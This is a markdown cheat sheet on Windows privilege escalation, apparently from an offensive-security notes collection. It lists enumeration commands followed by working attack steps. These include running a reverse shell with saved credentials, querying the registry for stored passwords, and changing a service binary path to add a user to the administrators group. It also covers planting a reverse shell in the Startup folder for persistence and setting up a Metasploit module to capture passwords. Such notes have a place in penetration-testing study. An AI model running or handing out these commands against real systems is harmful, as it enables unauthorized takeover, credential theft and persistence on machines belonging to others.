killchain-compendium/post_exploitation/priv_esc/docs/windows/windows_priv_esc.md

Windows Privilege Escalation

Links

• Fundamentals
• PowerShellEmpire
• JAWS

Account Types

• Administrator local & domain
• Standard local & domain
• Guest
• System

Enumeration

Users & Groups

whoami /priv
net users
net users <username>
net localgroup
net localgroup <groupname>
query session
qwinsta

Files

• powershell

System

hostname
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

• Installed software

wmic product get name,version,vendor

• Services

wmic service list brief | findstr  "Running"

Exploit

DLL Hijacking

• DLL hijacking

Unquoted Service Path

• unquoted service path

Token Impersonation

• SeImpersonatePrivilege is necessary, check via whoami priv
• Hot Potato is best before Server 2019 and Windows 10 (version 1809)
• Potatos

Schedules Tasks

• schtasks
• Autoruns64.exe

MSI Elevated Installer

• Always install elevated

Search for Credentials

cmdkey /list

• Use found credentials

runas /savecred /user:<user> reverse_shell.exe

• Keys containing passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

accesschk64 Permissions

• Check access to files and folders

accesschk64 -wvu "file.exe"

• If permission SERVICE_CHANGE_CONFIG is set

 sc config <service> binpath="net localgroup administrators user /add"

• Service escalation
• Any other binary works as well. Copy the compiled portable executable from the service_escalation onto the binary path.Restart the service afterwards.

Startup Application

• Put reverse shell instead of an executable inside C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

Password Mining

• Set up metasploit

use auxiliary/server/capture/http_basic
set srvport 7777
set uripath pass

• Visit site on target